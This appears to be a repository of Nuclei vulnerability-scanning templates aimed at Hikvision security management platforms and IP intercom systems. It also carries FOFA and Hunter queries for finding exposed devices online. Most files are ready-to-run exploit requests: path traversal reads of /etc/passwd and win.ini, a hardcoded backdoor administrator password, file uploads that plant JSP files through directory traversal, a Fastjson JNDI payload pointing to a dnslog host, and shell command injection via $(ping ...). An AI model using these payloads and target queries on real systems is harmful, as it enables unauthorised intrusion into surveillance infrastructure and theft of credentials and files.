├── Hikvision
├── 流媒体·弱口令admin 12345.txt
├── 复现失败.txt
├── 语法.txt
├── 9海康威视iSecure Center 综合安防管理平台files 接口存在任意文件读取.yaml
├── dnslog
│ ├── 34海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.yaml
│ ├── 5海康威视iSecure Center 综合安防管理平台存在applyCT Fastjson命令执行.yaml
│ └── 31海康威视综合安防管理平台productFile远程代码执行.yaml
├── 32海康威视综合安防download存在任意文件读取漏洞.yaml
├── 26海康威视SPON IP网络对讲广播系统index存在信息泄露.yaml
├── 23海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.yaml
├── 19海康威视SPON IP网络对讲广播系统存在后门账号poc1.yaml
├── 1海康威视流媒体管理服务器 user.xml 账号密码泄漏.yaml
├── 14海康威视 iVMS-8700综合安防管理平台 download 任意文件下载.yaml
├── 13海康威视iSecureCenter综合安防管理平台 svm文件上传poc2.yaml
├── 25海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露.yaml
├── 20海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)poc1.yaml
├── 2海康威视视频编码设备接入网关 showFile.php 任意文件下载.yaml
├── 28海康威视SPON IP网络对讲广播系统rj_get_token存在任意文件读取.yaml
├── 20海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)poc2.yaml
├── 33HIKVISION 视频编码设备接入网关 任意文件下载.yaml
├── 13海康威视iSecureCenter综合安防管理平台 svm文件上传poc1.yaml
├── 24海康威视SPON IP网络对讲广播系统getjson存在任意文件读取.yaml
├── 3海康威视视频编码设备接入网关userinfodata接口存在信息泄漏.yaml
├── 8海康威视iSecure Center综合安防管理平台 env 信息泄漏poc1.yaml
├── 8海康威视iSecure Center综合安防管理平台 env 信息泄漏poc2.yaml
├── 19海康威视SPON IP网络对讲广播系统存在后门账号poc2.yaml
├── 7海康威视iSecure Center综合安防管理平台 config.properties信息泄漏.yaml
├── 29海康威视SPON IP网络对讲广播系统uploadjson存在任意文件上传.yaml
├── 21海康威视SPON IP网络对讲广播系统addscenedata存在任意文件上传.yaml
├── 27海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传.yaml
├── 未验证
│ ├── 37海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.txt
│ └── 36海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞.txt
├── 37海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.yaml
├── 36海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞.yaml
├── 15海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露.yaml
├── 4海康威视IP摄像机NVR设备固件远程代码执行漏洞(CVE-2021-36260).yaml
├── 38海康威视-综合安防管理平台-file--任意文件上传.yaml
├── 22海康威视SPON IP网络对讲广播系统busyscreenshotpush存在任意文件上传.yaml
├── 6海康威视iSecure Center综合安防管理平台center任意文件上传.yaml
├── 6海康威视iSecure Center综合安防管理平台center任意文件上传poc2.yaml
├── 11海康威视iSecure Center综合安防管理平台lm任意文件上传.yaml
├── 18海康威视iVMS-8700综合安防系统resourceOperations任意文件上传.yaml
├── 17海康威视iVMS-8700综合安防管理平台 upload.action 任意文件上传.yaml
├── 35海康威视综合安防系统detection接口存在RCE漏洞.yaml
├── 16海康威视-ivms-8700-home-upload-getpic-任意文件上传.yaml
├── 12海康威视iSecure Center 综合安防管理平台ssoServicekeepalive远程代码执行.yaml
├── 10海康威视-综合安防管理平台-applyautologinticket-反序列化.yaml
└── 30海康威视运行管理中心 centerapisession 存在远程命令执行漏洞.yaml
├── 9767f83530934d7c060a5e974e85786.jpg
└── README.md
/Hikvision/流媒体·弱口令admin 12345.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Hikvision/复现失败.txt:
--------------------------------------------------------------------------------
1 | 海康威视综合安防管理平台 AutoLoginTicket 远程代码执行
2 | 海康威视iVMS-8700综合安防管理平台 getPic任意文件上传
--------------------------------------------------------------------------------
/9767f83530934d7c060a5e974e85786.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/YanXi9999/Nuclei-Scan-All/HEAD/9767f83530934d7c060a5e974e85786.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Nuclei-Scan-All
2 | 内网常用漏洞nuclei-poc汇总
3 | 目前汇总了公开的所有海康威视漏洞。38个海康威视漏洞共40余个poc,尽量每种poc都使用两种匹配器,减少误报
4 | 后续不断添加
5 | 使用截图
6 |
7 |
8 | 
9 |
10 | 2024.10.16 修改poc35,增加403判断减少误报
11 |
12 | 2024.10.17 修改tag为Hikvision,配合nuclei的根据tag扫描
13 | 有新漏洞欢迎提交issue
14 | 2024.10.21 修改几个poc的匹配条件,减少误报
15 |
--------------------------------------------------------------------------------
/Hikvision/语法.txt:
--------------------------------------------------------------------------------
1 | fofa
2 | title="综合安防管理平台"
3 | app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center"
4 | icon_hash="-1830859634" ip对讲系统
5 | title=”流媒体管理服务器”
6 | icon_hash="-911494769" ivm
7 | 海康威视安全接入网关任意文件读取漏洞 body="webui/js/jquerylib/jquery-1.7.2.min.js" && product="ABT-应用网关" || body="webui/js/jquerylib/jquery-1.7.2.min.js" && product="HIKVISION-安全网关"
8 |
9 |
10 |
11 |
12 | hunter
13 | web.body="vendors/custom/html5.min.js" ip系统
14 | web.body="/views/home/file/installPackage.rar"`||`web.body="/home/locationIndex.action" ivm8700
--------------------------------------------------------------------------------
/Hikvision/9海康威视iSecure Center 综合安防管理平台files 接口存在任意文件读取.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_9
2 |
3 | info:
4 | name: 海康威视iSecure Center 综合安防管理平台files 接口存在任意文件读取
5 | author: YanXi
6 | severity: medium
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | http:
13 | - raw:
14 | - |+
15 | GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
16 | Host: {{Hostname}}
17 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
18 | Connection: close
19 | Accept-Encoding: gzip, deflate, br
20 |
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
--------------------------------------------------------------------------------
/Hikvision/dnslog/34海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_34
2 |
3 | info:
4 | name: 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞
5 | author: Douliyoutang
6 | severity: critical
7 | description: description
8 | reference:
9 | tags: Hikvision
10 |
11 | http:
12 | - raw:
13 | - |+
14 | POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
15 | Host: {{Hostname}}
16 | Content-Type: application/x-www-form-urlencoded
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
18 |
19 | {"type":"environment","operate":"","machines":{"id":"$(ping+xxx.dnslog.cn)"}
20 |
21 |
22 |
--------------------------------------------------------------------------------
/Hikvision/32海康威视综合安防download存在任意文件读取漏洞.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_32
2 | info:
3 | name: 海康威视综合安防download任意文件读取
4 | author: YanXi
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
14 | Host: {{Hostname}}
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
16 | matchers-condition: or
17 | matchers:
18 | - type: word
19 | part: body
20 | words:
21 | - '0x00137607'
22 | - type: word
23 | part: body
24 | words:
25 | - root
26 |
--------------------------------------------------------------------------------
/Hikvision/dnslog/5海康威视iSecure Center 综合安防管理平台存在applyCT Fastjson命令执行.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_5
2 |
3 | info:
4 | name: 海康威视iSecure Center 综合安防管理平台存在applyCT Fastjson命令执行
5 | author: Douliyoutang
6 | severity: info
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | http:
13 | - raw:
14 | - |
15 | POST /bic/ssoService/v1/applyCT HTTP/1.1
16 | Host: {{Hostname}}
17 | User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
18 | Content-Length: 202
19 | Accept-Encoding: gzip, deflate
20 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
21 | Connection: close
22 | Content-Type: application/json
23 |
24 | {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}
--------------------------------------------------------------------------------
/Hikvision/26海康威视SPON IP网络对讲广播系统index存在信息泄露.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_26
2 |
3 | info:
4 | name: 海康威视SPON IP网络对讲广播系统index存在信息泄露
5 | author: YanXi
6 | severity: info
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | http:
13 | - raw:
14 | - |-
15 | GET /js/index.js?t=0.1 HTTP/1.1
16 | Host: {{Hostname}}
17 | Accept-Language: zh-CN,zh;q=0.9
18 | Cache-Control: max-age=0
19 | Accept-Encoding: gzip, deflate, br
20 | Connection: close
21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
22 | Upgrade-Insecure-Requests: 1
23 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
24 | Content-Length: 0
25 | matchers:
26 | - type: status
27 | status:
28 | - 200
--------------------------------------------------------------------------------
/Hikvision/23海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_23
2 |
3 | info:
4 | name: 海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893
5 | author: YanXi
6 | severity: medium
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | http:
13 | - raw:
14 | - |
15 | GET /php/exportrecord.php?downtype=10&downname=C:\ICPAS\Wnmp\WWW\php\conversion.php HTTP/1.1
16 | Host: {{Hostname}}
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
18 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
19 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
20 | Accept-Encoding: gzip, deflate
21 | Connection: close
22 | Upgrade-Insecure-Requests: 1
23 | X-Forwarded-For: 1.1.1.1
24 | matchers:
25 | - type: word
26 | part: body
27 | words:
28 | - php
--------------------------------------------------------------------------------
/Hikvision/19海康威视SPON IP网络对讲广播系统存在后门账号poc1.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_19
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统存在后门账号poc1
4 | author: YanXi
5 | severity: low
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST {{RootURL}}/php/login.php HTTP/1.1
14 | Host: {{Hostname}}
15 | Content-Length: 94
16 | Accept: application/json, text/javascript, */*; q=0.01
17 | X-Requested-With: XMLHttpRequest
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
19 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
20 | Accept-Encoding: gzip, deflate, br
21 | Accept-Language: zh-CN,zh;q=0.9
22 | Connection: keep-alive
23 |
24 | jsondata%5Busername%5D=administrator&jsondata%5Bpassword%5D=800823&jsondata%5Bisencrypted%5D=0
25 | matchers:
26 | - type: word
27 | part: body
28 | words:
29 | - '800823'
30 |
--------------------------------------------------------------------------------
/Hikvision/1海康威视流媒体管理服务器 user.xml 账号密码泄漏.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_1
2 |
3 | info:
4 | name: 海康流媒体user账号密码泄露
5 | author: YanXi
6 | severity: info
7 | description: description
8 | reference:
9 | - https://
10 | metadata:
11 | verified: true
12 | hunter-query: web.body="流媒体管理服务器"&&web.body="杭州海康威视系统技术有限公司 版权所有"
13 | tags: Hikvision
14 |
15 | http:
16 | - raw:
17 | - |+
18 | GET /config/user.xml HTTP/1.1
19 | Host: {{Hostname}}
20 | Cache-Control: max-age=0
21 | Upgrade-Insecure-Requests: 1
22 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
23 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
24 | Accept-Encoding: gzip, deflate, br
25 | Accept-Language: zh-CN,zh;q=0.9
26 | Connection: keep-alive
27 |
28 | matchers-condition: and
29 | matchers:
30 | - type: word
31 | part: body
32 | words:
33 | - password
34 |
--------------------------------------------------------------------------------
/Hikvision/14海康威视 iVMS-8700综合安防管理平台 download 任意文件下载.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_14
2 | info:
3 | name: 海康威视 iVMS-8700综合安防管理平台 download 任意文件下载
4 | author: YanXi
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 |
11 | variables:
12 | a1: "{{RootURL}}"
13 | a2: "{{a1}}/eps/api/triggerSnapshot/downloadsecretKeyIbuilding"
14 | a3: "{{md5('{{a2}}')}}"
15 | a4: "{{to_upper('{{a3}}')}}"
16 |
17 |
18 | http:
19 | - raw:
20 | - |+
21 | GET /eps/api/triggerSnapshot/download?token={{a4}}&fileUrl=file:///C:/windows/win.ini&fileName=1 HTTP/1.1
22 | Host: {{Hostname}}
23 | Accept: */*
24 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
25 | Accept-Encoding: gzip, deflate
26 | Accept-Language: zh-CN,zh;q=0.9
27 | matchers-condition: or
28 | matchers:
29 | - type: word
30 | part: body
31 | words:
32 | - 'windows'
33 | - type: word
34 | part: body
35 | words:
36 | - 'extensions'
37 |
--------------------------------------------------------------------------------
/Hikvision/13海康威视iSecureCenter综合安防管理平台 svm文件上传poc2.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_13_2
2 | info:
3 | name: 海康威视iSecureCenter综合安防管理平台 svm文件上传poc2
4 | author: YanXi
5 | severity: high
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |+
13 | POST /svm/api/external/report HTTP/1.1
14 | Host: {{Hostname}}
15 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
16 | Content-Length: 308
17 |
18 | ------WebKitFormBoundary9PggsiM755PLa54a
19 | Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
20 | Content-Type: application/zip
21 |
22 | <%out.print("testax");%>
23 |
24 | ------WebKitFormBoundary9PggsiM755PLa54a--
25 |
26 | - |+
27 | GET /portal/ui/login/..;/..;/new.jsp HTTP/1.1
28 | Host: {{Hostname}}
29 |
30 | matchers:
31 | - type: dsl
32 | dsl:
33 | - "contains(body_2, 'testax') "
--------------------------------------------------------------------------------
/Hikvision/25海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_25
2 |
3 | info:
4 | name: 海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露
5 | author: YanXi
6 | severity: info
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | http:
13 | - raw:
14 | - |-
15 | POST /php/getuserdata.php HTTP/1.1
16 | Host: {{Hostname}}
17 | Cache-Control: max-age=0
18 | Upgrade-Insecure-Requests: 1
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
20 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
21 | Accept-Encoding: gzip, deflate, br
22 | Accept-Language: zh-CN,zh;q=0.9
23 | Connection: close
24 | Content-Type: application/x-www-form-urlencoded
25 | Content-Length: 44
26 |
27 | jsondata[pageIndex]=0&jsondata[pageCount]=30
28 | matchers:
29 | - type: word
30 | part: body
31 | words:
32 | - '"res":"1"'
--------------------------------------------------------------------------------
/Hikvision/20海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)poc1.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_20
2 | info:
3 | name: 海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)poc1
4 | author: YanXi
5 | severity: critical
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /php/ping.php HTTP/1.1
14 | Host: {{Hostname}}
15 | Content-Length: 46
16 | Pragma: no-cache
17 | Cache-Control: no-cache
18 | Upgrade-Insecure-Requests: 1
19 | Content-Type: application/x-www-form-urlencoded
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
22 | Accept-Encoding: gzip, deflate, br
23 | Accept-Language: zh-CN,zh;q=0.9
24 | Connection: close
25 |
26 | jsondata%5Btype%5D=3&jsondata%5Bip%5D=echo%20test
27 | matchers:
28 | - type: word
29 | part: body
30 | words:
31 | - test
32 |
--------------------------------------------------------------------------------
/Hikvision/2海康威视视频编码设备接入网关 showFile.php 任意文件下载.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_2
2 |
3 | info:
4 | name: 海康showfile任意文件下载
5 | author: YanXi
6 | severity: medium
7 | description: description
8 | reference:
9 | - https://
10 | metadata:
11 | verified: true
12 | hunter-query: web.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"
13 | tags: Hikvision
14 |
15 | http:
16 | - raw:
17 | - |+
18 | GET /serverLog/showFile.php?fileName=../web/html/main.php HTTP/1.1
19 | Host: {{Hostname}}
20 | Cache-Control: max-age=0
21 | Upgrade-Insecure-Requests: 1
22 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
23 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
24 | Accept-Encoding: gzip, deflate, br
25 | Accept-Language: zh-CN,zh;q=0.9
26 | Connection: keep-alive
27 |
28 | matchers-condition: and
29 | matchers:
30 | - type: word
31 | part: body
32 | words:
33 | - index.php
--------------------------------------------------------------------------------
/Hikvision/28海康威视SPON IP网络对讲广播系统rj_get_token存在任意文件读取.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_28
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统rj_get_token存在任意文件读取
4 | author: YanXi
5 | severity: info
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 |
11 | http:
12 | - raw:
13 | - |-
14 | POST /php/rj_get_token.php HTTP/1.1
15 | Host: {{Hostname}}
16 | Content-Length: 120
17 | Accept: application/json, text/javascript, */*; q=0.01
18 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
19 | X-Requested-With: XMLHttpRequest
20 | Sec-Ch-Ua-Mobile: ?0
21 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
22 | Sec-Ch-Ua-Platform: ""
23 | Sec-Fetch-Site: same-origin
24 | Sec-Fetch-Mode: cors
25 | Sec-Fetch-Dest: empty
26 | Accept-Encoding: gzip, deflate
27 | Accept-Language: zh-CN,zh;q=0.9
28 | Connection: close
29 |
30 | jsondata[url]=rj_get_token.php
31 | matchers:
32 | - type: status
33 | status:
34 | - 200
--------------------------------------------------------------------------------
/Hikvision/20海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)poc2.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_20
2 | info:
3 | name: 海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)poc2
4 | author: YanXi
5 | severity: critical
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST {{RootURL}}/php/ping.php HTTP/1.1
14 | Host: {{Hostname}}
15 | Content-Length: 49
16 | Pragma: no-cache
17 | Cache-Control: no-cache
18 | Upgrade-Insecure-Requests: 1
19 | Content-Type: application/x-www-form-urlencoded
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
22 | Accept-Encoding: gzip, deflate, br
23 | Accept-Language: zh-CN,zh;q=0.9
24 | Connection: close
25 |
26 | jsondata%5Btype%5D=3&jsondata%5Bip%5D=echo%20test
27 | matchers:
28 | - type: word
29 | part: body
30 | words:
31 | - test
32 |
--------------------------------------------------------------------------------
/Hikvision/33HIKVISION 视频编码设备接入网关 任意文件下载.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_33
2 |
3 | info:
4 | name: HIKVISION 视频编码设备接入网关 任意文件下载
5 | author: YanXi
6 | severity: medium
7 | description: description
8 | reference:
9 | - https://
10 | metadata:
11 | verified: true
12 | hunter-query: web.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"
13 | tags: Hikvision
14 |
15 | http:
16 | - raw:
17 | - |+
18 | GET /serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php HTTP/1.1
19 | Host: {{Hostname}}
20 | Cache-Control: max-age=0
21 | Upgrade-Insecure-Requests: 1
22 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
23 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
24 | Accept-Encoding: gzip, deflate, br
25 | Accept-Language: zh-CN,zh;q=0.9
26 | Connection: keep-alive
27 |
28 | matchers-condition: and
29 | matchers:
30 | - type: word
31 | part: body
32 | words:
33 | - php
--------------------------------------------------------------------------------
/Hikvision/13海康威视iSecureCenter综合安防管理平台 svm文件上传poc1.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_13_1
2 | info:
3 | name: 海康威视iSecureCenter综合安防管理平台 svm文件上传
4 | author: YanXi
5 | severity: high
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /svm/api/external/report HTTP/1.1
14 | Content-Type: multipart/form-data; boundary=00content0boundary00
15 | User-Agent: Java/1.8.0_371
16 | Host: {{Hostname}}
17 | Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
18 | Connection: close
19 | Content-Length: 170
20 |
21 | --00content0boundary00
22 | Content-Disposition: form-data; name="file"; filename="../../../tomcat85linux64.1/webapps/els/static/1ndex.txt"
23 |
24 | 12ndex
25 | --00content0boundary00--
26 | - |+
27 | GET /els/static/1ndex.txt HTTP/1.1
28 | User-Agent: Java/1.8.0_371
29 | Host: {{Hostname}}
30 | Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
31 | Connection: close
32 |
33 | matchers:
34 | - type: dsl
35 | dsl:
36 | - "contains(body_2, '12ndex') "
--------------------------------------------------------------------------------
/Hikvision/24海康威视SPON IP网络对讲广播系统getjson存在任意文件读取.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_24
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统getjson存在任意文件读取
4 | author: YanXi
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /php/getjson.php HTTP/1.1
14 | Host: {{Hostname}}
15 | Cache-Control: max-age=0
16 | Upgrade-Insecure-Requests: 1
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
18 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
19 | Accept-Encoding: gzip, deflate, br
20 | Accept-Language: zh-CN,zh;q=0.9
21 | Connection: close
22 | Content-Type: application/x-www-form-urlencoded
23 | Content-Length: 44
24 |
25 | jsondata[filename]=./ocx.json
26 | matchers-condition: or
27 | matchers:
28 | - type: word
29 | part: body
30 | words:
31 | - '"res":"1"'
32 | - type: word
33 | part: body
34 | words:
35 | - 'ocx'
36 |
--------------------------------------------------------------------------------
/Hikvision/3海康威视视频编码设备接入网关userinfodata接口存在信息泄漏.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_3
2 | info:
3 | name: 海康userinfodata泄露
4 | author: YanXi
5 | severity: info
6 | description: description
7 | reference:
8 | - https://
9 | metadata:
10 | verified: true
11 | hunter-query: web.body="流媒体管理服务器"&&web.body="杭州海康威视系统技术有限公司 版权所有"
12 | tags: Hikvision
13 | http:
14 | - raw:
15 | - |-
16 | POST /data/userInfoData.php HTTP/1.1
17 | Host: {{Hostname}}
18 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
19 | Sec-Ch-Ua-Mobile: ?0
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
21 | Sec-Ch-Ua-Platform: "Windows"
22 | Accept: */*
23 | Sec-Fetch-Site: same-origin
24 | Sec-Fetch-Mode: no-cors
25 | Sec-Fetch-Dest: script
26 | Accept-Encoding: gzip, deflate, br
27 | Accept-Language: zh-CN,zh;q=0.9
28 | Connection: keep-alive
29 | Content-Type: application/x-www-form-urlencoded
30 | Content-Length: 36
31 |
32 | page=1&rows=20&sort=userId&order=asc
33 | matchers:
34 | - type: word
35 | part: body
36 | words:
37 | - password
38 |
--------------------------------------------------------------------------------
/Hikvision/8海康威视iSecure Center综合安防管理平台 env 信息泄漏poc1.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_8_1
2 | info:
3 | name: 海康威视iSecure Center综合安防管理平台 env 信息泄漏poc1
4 | author: YanXi
5 | severity: info
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |+
13 | GET /artemis/env HTTP/1.1
14 | Host: {{Hostname}}
15 | Cache-Control: max-age=0
16 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
17 | Sec-Ch-Ua-Mobile: ?0
18 | Sec-Ch-Ua-Platform: "Windows"
19 | Upgrade-Insecure-Requests: 1
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
22 | Sec-Fetch-Site: none
23 | Sec-Fetch-Mode: navigate
24 | Sec-Fetch-User: ?1
25 | Sec-Fetch-Dest: document
26 | Accept-Encoding: gzip, deflate, br
27 | Accept-Language: zh-CN,zh;q=0.9
28 | Connection: keep-alive
29 |
30 | matchers:
31 | - type: word
32 | part: body
33 | words:
34 | - profiles
35 |
--------------------------------------------------------------------------------
/Hikvision/8海康威视iSecure Center综合安防管理平台 env 信息泄漏poc2.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_8_2
2 | info:
3 | name: 海康威视iSecure Center综合安防管理平台 env 信息泄漏poc2
4 | author: YanXi
5 | severity: info
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |+
13 | GET /artemis-portal/artemis/env HTTP/1.1
14 | Host: {{Hostname}}
15 | Cache-Control: max-age=0
16 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
17 | Sec-Ch-Ua-Mobile: ?0
18 | Sec-Ch-Ua-Platform: "Windows"
19 | Upgrade-Insecure-Requests: 1
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
